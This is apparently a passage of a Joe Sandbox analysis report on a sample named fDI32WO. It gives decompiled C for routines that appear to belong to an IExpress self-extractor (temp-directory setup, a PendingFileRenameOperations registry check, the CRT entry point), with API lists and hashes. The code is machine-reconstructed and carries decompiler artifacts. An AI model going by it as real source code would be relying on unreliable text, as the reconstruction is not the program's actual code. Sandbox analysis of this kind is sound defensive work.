                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85413
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85415
                                                                                                                                                                                                                                              0x00a85416
                                                                                                                                                                                                                                              0x00a85427
                                                                                                                                                                                                                                              0x00a8542a
                                                                                                                                                                                                                                              0x00a8542b
                                                                                                                                                                                                                                              0x00a85434
                                                                                                                                                                                                                                              0x00a85434
                                                                                                                                                                                                                                              0x00a8543a
                                                                                                                                                                                                                                              0x00a8544c
                                                                                                                                                                                                                                              0x00a8544c
                                                                                                                                                                                                                                              0x00a85452
                                                                                                                                                                                                                                              0x00a8545a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8545e
                                                                                                                                                                                                                                              0x00a8545f
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8171E: _vsnprintf.MSVCRT ref: 00A81750
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A853FB
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85402
                                                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8541F
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8542B
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85434
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85452
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                              • API String ID: 1082909758-7194216
                                                                                                                                                                                                                                              • Opcode ID: fa17b3ca04740a1f312de62643eb90a60d7daa2c4780aeafbca706363e5eec6f
                                                                                                                                                                                                                                              • Instruction ID: 729168984b7d11c71c6acb9c9fd986cee06475f4184e4bd3f5c0301c7c88fbbf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa17b3ca04740a1f312de62643eb90a60d7daa2c4780aeafbca706363e5eec6f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0911C171B0060467E320FB769D49FEF766EEBD5711F00012AFA46D6290DE78898387A2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 478 a85467-a85484 479 a8548a-a85490 call a853a1 478->479 480 a8551c-a85528 call a81680 478->480 483 a85495-a85497 479->483 484 a8552d-a85539 call a858c8 480->484 485 a8549d-a854c0 call a81781 483->485 486 a85581-a85583 483->486 493 a8553b-a85545 CreateDirectoryA 484->493 494 a8554d-a85552 484->494 495 a8550c-a8551a call a8658a 485->495 496 a854c2-a854d8 GetSystemInfo 485->496 489 a8558d-a8559d call a86ce0 486->489 498 a85577-a8557c call a86285 493->498 499 a85547 493->499 500 a85554-a85557 call a8597d 494->500 501 a85585-a8558b 494->501 495->484 504 a854da-a854dd 496->504 505 a854fe 496->505 498->486 499->494 511 a8555c-a8555e 500->511 501->489 509 a854df-a854e2 504->509 510 a854f7-a854fc 504->510 512 a85503-a85507 call a8658a 505->512 514 a854f0-a854f5 509->514 515 a854e4-a854e7 509->515 510->512 511->501 516 a85560-a85566 511->516 512->495 514->512 515->495 518 a854e9-a854ee 515->518 516->486 517 a85568-a85575 RemoveDirectoryA 516->517 517->486 518->512
                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E00A85467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t10;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                                                              				CHAR* _t48;
                                                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t10 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				if(__edx == 0) {
                                                                                                                                                                                                                                              					_t48 = 0xa891e4;
                                                                                                                                                                                                                                              					_t42 = 0x104;
                                                                                                                                                                                                                                              					E00A81680(0xa891e4, 0x104);
                                                                                                                                                                                                                                              					L14:
                                                                                                                                                                                                                                              					_t13 = E00A858C8(_t48); // executed
                                                                                                                                                                                                                                              					if(_t13 != 0) {
                                                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                                                              						_t42 = _a4;
                                                                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                              							 *0xa89124 = 0;
                                                                                                                                                                                                                                              							_t14 = 1;
                                                                                                                                                                                                                                              							L24:
                                                                                                                                                                                                                                              							return E00A86CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t16 = E00A8597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                              						if(_t16 != 0) {
                                                                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t61 =  *0xa88a20; // 0x0
                                                                                                                                                                                                                                              						if(_t61 != 0) {
                                                                                                                                                                                                                                              							 *0xa88a20 = 0;
                                                                                                                                                                                                                                              							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L22:
                                                                                                                                                                                                                                              						_t14 = 0;
                                                                                                                                                                                                                                              						goto L24;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                              						 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0xa88a20 = 1;
                                                                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t42 =  &_v268;
                                                                                                                                                                                                                                              				_t20 = E00A853A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                              				if(_t20 == 0) {
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t48 = 0xa891e4;
                                                                                                                                                                                                                                              				E00A81781(0xa891e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                              				if(( *0xa89a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_t42 = 0x104;
                                                                                                                                                                                                                                              					E00A8658A(_t48, 0x104, 0xa81140);
                                                                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                              				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                              				if(_t26 == 0) {
                                                                                                                                                                                                                                              					_push("i386");
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					E00A8658A(_t48, 0x104);
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t28 = _t26 - 1;
                                                                                                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                                                                                                              					_push("mips");
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t29 = _t28 - 1;
                                                                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                                                                              					_push("alpha");
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t29 != 1) {
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push("ppc");
                                                                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                                                                              			}




















                                                                                                                                                                                                                                              0x00a85472
                                                                                                                                                                                                                                              0x00a85479
                                                                                                                                                                                                                                              0x00a85481
                                                                                                                                                                                                                                              0x00a85484
                                                                                                                                                                                                                                              0x00a8551c
                                                                                                                                                                                                                                              0x00a85521
                                                                                                                                                                                                                                              0x00a85528
                                                                                                                                                                                                                                              0x00a8552d
                                                                                                                                                                                                                                              0x00a8552f
                                                                                                                                                                                                                                              0x00a85539
                                                                                                                                                                                                                                              0x00a8554d
                                                                                                                                                                                                                                              0x00a8554d
                                                                                                                                                                                                                                              0x00a85552
                                                                                                                                                                                                                                              0x00a85585
                                                                                                                                                                                                                                              0x00a85585
                                                                                                                                                                                                                                              0x00a8558b
                                                                                                                                                                                                                                              0x00a8558d
                                                                                                                                                                                                                                              0x00a8559d
                                                                                                                                                                                                                                              0x00a8559d
                                                                                                                                                                                                                                              0x00a85557
                                                                                                                                                                                                                                              0x00a8555e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85560
                                                                                                                                                                                                                                              0x00a85566
                                                                                                                                                                                                                                              0x00a85569
                                                                                                                                                                                                                                              0x00a8556f
                                                                                                                                                                                                                                              0x00a8556f
                                                                                                                                                                                                                                              0x00a85581
                                                                                                                                                                                                                                              0x00a85581
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85581
                                                                                                                                                                                                                                              0x00a85545
                                                                                                                                                                                                                                              0x00a8557c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8557c
                                                                                                                                                                                                                                              0x00a85547
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85547
                                                                                                                                                                                                                                              0x00a8548a
                                                                                                                                                                                                                                              0x00a85490
                                                                                                                                                                                                                                              0x00a85497
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8549d
                                                                                                                                                                                                                                              0x00a854ab
                                                                                                                                                                                                                                              0x00a854b4
                                                                                                                                                                                                                                              0x00a854c0
                                                                                                                                                                                                                                              0x00a8550c
                                                                                                                                                                                                                                              0x00a85511
                                                                                                                                                                                                                                              0x00a85515
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85515
                                                                                                                                                                                                                                              0x00a854c9
                                                                                                                                                                                                                                              0x00a854d6
                                                                                                                                                                                                                                              0x00a854d8
                                                                                                                                                                                                                                              0x00a854fe
                                                                                                                                                                                                                                              0x00a85503
                                                                                                                                                                                                                                              0x00a85507
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85507
                                                                                                                                                                                                                                              0x00a854da
                                                                                                                                                                                                                                              0x00a854dd
                                                                                                                                                                                                                                              0x00a854f7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a854f7
                                                                                                                                                                                                                                              0x00a854df
                                                                                                                                                                                                                                              0x00a854e2
                                                                                                                                                                                                                                              0x00a854f0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a854f0
                                                                                                                                                                                                                                              0x00a854e7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a854e9
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A854C9
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8553D
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8556F
                                                                                                                                                                                                                                                • Part of subcall function 00A853A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A853FB
                                                                                                                                                                                                                                                • Part of subcall function 00A853A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85402
                                                                                                                                                                                                                                                • Part of subcall function 00A853A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8541F
                                                                                                                                                                                                                                                • Part of subcall function 00A853A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8542B
                                                                                                                                                                                                                                                • Part of subcall function 00A853A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85434
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                              • API String ID: 1979080616-3696344869
                                                                                                                                                                                                                                              • Opcode ID: 8e1d30d12470103a2f380cd32555af2a3a903f06d6b10086e1dd55f5ffb421de
                                                                                                                                                                                                                                              • Instruction ID: 02ad73c3f5eba09d5f9cea8c29de5014575fac06151407ebfd5ab260e1813bc9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e1d30d12470103a2f380cd32555af2a3a903f06d6b10086e1dd55f5ffb421de
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3631D171F00A046BDB18BBB99D4897FB6AFEB81740B18016AAC0286590DF748E128795
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 519 a8256d-a8257d 520 a82622-a82627 call a824e0 519->520 521 a82583-a82589 519->521 528 a82629-a8262f 520->528 523 a825e8-a82607 RegOpenKeyExA 521->523 524 a8258b 521->524 525 a82609-a82620 RegQueryInfoKeyA 523->525 526 a825e3-a825e6 523->526 524->528 529 a82591-a82595 524->529 530 a825d1-a825dd RegCloseKey 525->530 526->528 529->528 531 a8259b-a825ba RegOpenKeyExA 529->531 530->526 531->526 532 a825bc-a825cb RegQueryValueExA 531->532 532->530
                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E00A8256D(signed int __ecx) {
                                                                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				long _t24;
                                                                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                                                                              				int _t31;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                              				_t31 = 0;
                                                                                                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                                                                                                              					_t31 = E00A824E0(_t26);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t34 = _t13 - 1;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						_v8 = 0;
                                                                                                                                                                                                                                              						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                              							goto L7;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                              							_v8 = 0;
                                                                                                                                                                                                                                              							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                              							if(_t24 == 0) {
                                                                                                                                                                                                                                              								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                              								L6:
                                                                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                                                                              								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                              								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							L7:
                                                                                                                                                                                                                                              							_t31 = _v8;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t31;
                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x00a82572
                                                                                                                                                                                                                                              0x00a82573
                                                                                                                                                                                                                                              0x00a82575
                                                                                                                                                                                                                                              0x00a82578
                                                                                                                                                                                                                                              0x00a8257d
                                                                                                                                                                                                                                              0x00a82627
                                                                                                                                                                                                                                              0x00a82583
                                                                                                                                                                                                                                              0x00a82586
                                                                                                                                                                                                                                              0x00a82589
                                                                                                                                                                                                                                              0x00a825eb
                                                                                                                                                                                                                                              0x00a82607
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82609
                                                                                                                                                                                                                                              0x00a8261a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8261a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8258b
                                                                                                                                                                                                                                              0x00a8258b
                                                                                                                                                                                                                                              0x00a8259e
                                                                                                                                                                                                                                              0x00a825b2
                                                                                                                                                                                                                                              0x00a825ba
                                                                                                                                                                                                                                              0x00a825cb
                                                                                                                                                                                                                                              0x00a825d1
                                                                                                                                                                                                                                              0x00a825d6
                                                                                                                                                                                                                                              0x00a825da
                                                                                                                                                                                                                                              0x00a825dd
                                                                                                                                                                                                                                              0x00a825dd
                                                                                                                                                                                                                                              0x00a825e3
                                                                                                                                                                                                                                              0x00a825e3
                                                                                                                                                                                                                                              0x00a825e3
                                                                                                                                                                                                                                              0x00a8258b
                                                                                                                                                                                                                                              0x00a82589
                                                                                                                                                                                                                                              0x00a8262f
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00A84096,00A84096,?,00A81ED3,00000001,00000000,?,?,00A84137,?), ref: 00A825B2
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A84096,?,00A81ED3,00000001,00000000,?,?,00A84137,?,00A84096), ref: 00A825CB
                                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,00A81ED3,00000001,00000000,?,?,00A84137,?,00A84096), ref: 00A825DD
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00A84096,00A84096,?,00A81ED3,00000001,00000000,?,?,00A84137,?), ref: 00A825FF
                                                                                                                                                                                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A84096,00000000,00000000,00000000,00000000,?,00A81ED3,00000001,00000000), ref: 00A8261A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A825F5
                                                                                                                                                                                                                                              • System\CurrentControlSet\Control\Session Manager, xrefs: 00A825A8
                                                                                                                                                                                                                                              • PendingFileRenameOperations, xrefs: 00A825C3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                              • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                              • Opcode ID: 485c7cafb38092b098fa41070055cc46f8ac66848acd4f2cd2ab2e63fd5c2ca0
                                                                                                                                                                                                                                              • Instruction ID: a8046732275fbd10a659d4ec78ea41a6f03202a0f4b6870b7f8ac5a5fe23ece2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 485c7cafb38092b098fa41070055cc46f8ac66848acd4f2cd2ab2e63fd5c2ca0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61114635942128FBAB24FB919C09EFBBF7CEF157A1F504065B809A2011DA345E45E7A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 533 a86a60-a86a91 call a87155 call a87208 GetStartupInfoW 539 a86a93-a86aa2 533->539 540 a86abc-a86abe 539->540 541 a86aa4-a86aa6 539->541 544 a86abf-a86ac5 540->544 542 a86aa8-a86aad 541->542 543 a86aaf-a86aba Sleep 541->543 542->544 543->539 545 a86ad1-a86ad7 544->545 546 a86ac7-a86acf _amsg_exit 544->546 548 a86ad9-a86ae9 call a86c3f 545->548 549 a86b05 545->549 547 a86b0b-a86b11 546->547 550 a86b2e-a86b30 547->550 551 a86b13-a86b24 _initterm 547->551 555 a86aee-a86af2 548->555 549->547 553 a86b3b-a86b42 550->553 554 a86b32-a86b39 550->554 551->550 556 a86b44-a86b51 call a87060 553->556 557 a86b67-a86b71 553->557 554->553 555->547 558 a86af4-a86b00 555->558 556->557 566 a86b53-a86b65 556->566 560 a86b74-a86b79 557->560 561 a86c39-a86c3e call a8724d 558->561 564 a86b7b-a86b7d 560->564 565 a86bc5-a86bc8 560->565 570 a86b7f-a86b81 564->570 571 a86b94-a86b98 564->571 568 a86bca-a86bd3 565->568 569 a86bd6-a86be3 _ismbblead 565->569 566->557 568->569 575 a86be9-a86bed 569->575 576 a86be5-a86be6 569->576 570->565 572 a86b83-a86b85 570->572 573 a86b9a-a86b9e 571->573 574 a86ba0-a86ba2 571->574 572->571 577 a86b87-a86b8a 572->577 578 a86ba3-a86bbc call a82bfb 573->578 574->578 575->560 580 a86c1e-a86c25 575->580 576->575 577->571 581 a86b8c-a86b92 577->581 578->580 586 a86bbe-a86bbf exit 578->586 582 a86c32 580->582 583 a86c27-a86c2d _cexit 580->583 581->572 582->561 583->582 586->565
                                                                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                                                                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                              				signed int* _t25;
                                                                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                                              				signed char _t41;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              				signed int _t54;
                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                                                                                              				intOrPtr* _t60;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				void* _t67;
                                                                                                                                                                                                                                              				void* _t68;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				E00A87155();
                                                                                                                                                                                                                                              				_push(0x58);
                                                                                                                                                                                                                                              				_push(0xa872b8);
                                                                                                                                                                                                                                              				E00A87208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                              				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                              				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                              				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                              				_t53 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                              					if(0 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(0 != _t56) {
                                                                                                                                                                                                                                              						Sleep(0x3e8);
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t58 = 1;
